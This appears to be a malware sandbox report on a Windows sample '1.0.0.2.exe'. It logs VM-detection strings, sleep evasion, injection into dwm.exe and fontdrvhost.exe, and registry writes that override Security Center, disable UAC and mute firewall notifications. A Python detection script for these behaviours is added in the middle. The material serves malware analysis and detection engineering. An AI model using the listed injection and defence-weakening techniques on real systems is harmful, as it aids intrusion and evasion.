Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 300000
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 360000
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 2100000
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winmefmb.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe Dropped PE file which has not been started: C:\iuepn.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VF.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\1.0.0.2.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 6272 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 4996 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 1524 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 2448 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3180 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 4996 Thread sleep time: -2100000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 005B1754h 2_2_005B1718
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6BADD Sleep,FindFirstFileA,FindNextFileA,Sleep, 0_2_02B6BADD
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B657A0 FindFirstFileA,FindNextFileA,Sleep, 0_2_02B657A0
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 2_2_005B29E2
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 2_2_005B2B8C
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 120000
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 300000
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 360000
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 2100000
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: Amcache.hve.2.dr Binary or memory string: VMware
Source: dwm.exe, 00000007.00000002.3403250038.000001D156AA0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
Source: Amcache.hve.2.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr Binary or memory string: VMware, Inc.
Source: rksowY.exe, 00000002.00000002.2243579607.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpi
Source: Amcache.hve.2.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266166178.0000000001172000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266166178.0000000001172000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWk<=
Source: Amcache.hve.2.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: dwm.exe, 00000007.00000002.3403250038.000001D156B0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWengineer
Source: Amcache.hve.2.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\1.0.0.2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\1.0.0.2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02BEBCD0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_02BEBCD0
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_00D63044 mov eax, dword ptr fs:[00000030h] 0_2_00D63044
Source: C:\Users\user\Desktop\1.0.0.2.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\1.0.0.2.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\1.0.0.2.exe Memory allocated: C:\Windows\System32\fontdrvhost.exe base: AD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory allocated: C:\Windows\System32\fontdrvhost.exe base: DE0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory allocated: C:\Windows\System32\dwm.exe base: 380000 protect: page execute and read and write
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6CC92 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification, 0_2_02B6CC92
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: AD0000
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: DE0000
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory written: C:\Windows\System32\dwm.exe base: 380000
Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: dwm.exe, 00000007.00000002.3405771317.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000007.00000000.2226927771.000001D159439000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: SciTE.exe.2.dr Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv, 2_2_005B1718
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B61B0E GetUserNameA,RegOpenKeyExA,RegCreateKeyA,GlobalAlloc,GlobalFree, 0_2_02B61B0E
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 2_2_005B139F

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\1.0.0.2.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShell
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotifications
Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Registry value created: DisableNotifications 1
Source: Amcache.hve.2.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: MsMpEng.exe
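The two behaviours above, the CreateRemoteThread injection into dwm.exe and fontdrvhost.exe and the Security Center / EnableLUA / firewall-notification / SafeBoot registry writes, are the kind of host telemetry a detection engineer would turn into a triage rule. The block below is an added example, not code from the sample or from the sandbox report: it folds Sysmon-style events (EID 8 CreateRemoteThread, EID 12 key/value create or delete, EID 13 value set) into one finding per technique and actor. The event records are constructed for this example; the registry paths follow the report, while the DWORD written to AntiVirusOverride and the EnableLUA value of 0 are assumed from the report's "Changes security center settings" and "Disables UAC (registry)" verdicts, since the report does not print those values.

```python
import re
from dataclasses import dataclass, field

# Sysmon event IDs referenced below (standard Sysmon numbering).
CREATE_REMOTE_THREAD = 8
REGISTRY_KEY_EVENT = 12     # EventType CreateKey / DeleteKey / DeleteValue
REGISTRY_VALUE_SET = 13

# Processes a user-mode executable has no business writing into; the report
# shows WriteProcessMemory into both.
PROTECTED_TARGETS = {"dwm.exe", "fontdrvhost.exe"}

# Registry locations the report lists. Each needle is matched as a substring of
# the normalised path so the WOW6432Node view and any ControlSetNNN match. The
# integer is the DWORD that represents the weakened state; None means any
# write or delete at that location counts.
WEAKENING_WRITES = {
    r"microsoft\security center\antivirusoverride": ("Security Center AV override", 1),
    r"microsoft\security center\svc": ("Security Center service settings", None),
    r"policies\system\enablelua": ("UAC disabled (EnableLUA=0)", 0),
    r"firewallpolicy\standardprofile\disablenotifications": ("Firewall notifications off", 1),
    r"control\safeboot\alternateshell": ("Safe Mode shell removed", None),
}


@dataclass
class SysmonEvent:
    event_id: int
    image: str          # acting process (Sysmon "Image")
    target: str         # TargetImage (EID 8) or TargetObject (EID 12/13)
    details: str = ""   # "DWORD (0x00000001)" for EID 13, EventType for EID 12


@dataclass
class Finding:
    technique: str
    actor: str
    evidence: list = field(default_factory=list)


_DWORD = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")


def dword_value(details):
    """Return the integer from a Sysmon 'DWORD (0x........)' Details string, else None."""
    m = _DWORD.search(details)
    return int(m.group(1), 16) if m else None


def normalise_key(path):
    """Lower-case and drop the 32-bit redirector so both registry views compare equal."""
    return path.lower().replace(r"\wow6432node", "")


def triage(events):
    """Fold an event stream into one Finding per (technique, actor), keeping every piece of evidence."""
    findings = {}

    def record(technique, ev, evidence):
        findings.setdefault((technique, ev.image), Finding(technique, ev.image)).evidence.append(evidence)

    for ev in events:
        if ev.event_id == CREATE_REMOTE_THREAD:
            if ev.target.rsplit("\\", 1)[-1].lower() in PROTECTED_TARGETS:
                record("remote thread injection", ev, ev.target)
        elif ev.event_id in (REGISTRY_KEY_EVENT, REGISTRY_VALUE_SET):
            key = normalise_key(ev.target)
            for needle, (label, weak_value) in WEAKENING_WRITES.items():
                if needle in key and (weak_value is None or dword_value(ev.details) == weak_value):
                    record(label, ev, f"{ev.target} -> {ev.details}")
    return list(findings.values())


# Constructed sample telemetry for this example (not captured from the sandbox).
SAMPLE = r"C:\Users\user\Desktop\1.0.0.2.exe"
SAMPLE_EVENTS = [
    SysmonEvent(8, SAMPLE, r"C:\Windows\System32\dwm.exe"),
    SysmonEvent(8, SAMPLE, r"C:\Windows\System32\fontdrvhost.exe"),
    SysmonEvent(13, SAMPLE, r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride",
                "DWORD (0x00000001)"),  # value assumed from the report's verdict
    SysmonEvent(12, SAMPLE, r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc", "CreateKey"),
    SysmonEvent(13, SAMPLE, r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
                "DWORD (0x00000000)"),  # 0 assumed from "Disables UAC (registry)"
    SysmonEvent(13, SAMPLE, r"HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy"
                            r"\StandardProfile\DisableNotifications", "DWORD (0x00000001)"),
    SysmonEvent(12, SAMPLE, r"HKLM\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", "DeleteValue"),
    # Benign noise that must not fire: UAC being turned on, and a thread into a non-protected target.
    SysmonEvent(13, r"C:\Windows\System32\svchost.exe",
                r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", "DWORD (0x00000001)"),
    SysmonEvent(8, r"C:\Windows\System32\csrss.exe", r"C:\Windows\System32\notepad.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.technique:32} {f.actor}")
        for e in f.evidence:
            print(f"    {e}")
```

Matching on the tail of the path rather than the full hive path is deliberate: the sample writes through the WOW6432Node view and the report shows ControlSet001, but a live host may expose the same settings under the native view or a different control set. The EnableLUA rule only fires when the value written is 0, so a hardening script that re-enables UAC does not produce a finding.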

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: rksowY.exe PID: 5344, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: rksowY.exe PID: 5344, type: MEMORYSTR
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B63911 socket,setsockopt,bind,recvfrom, 0_2_02B63911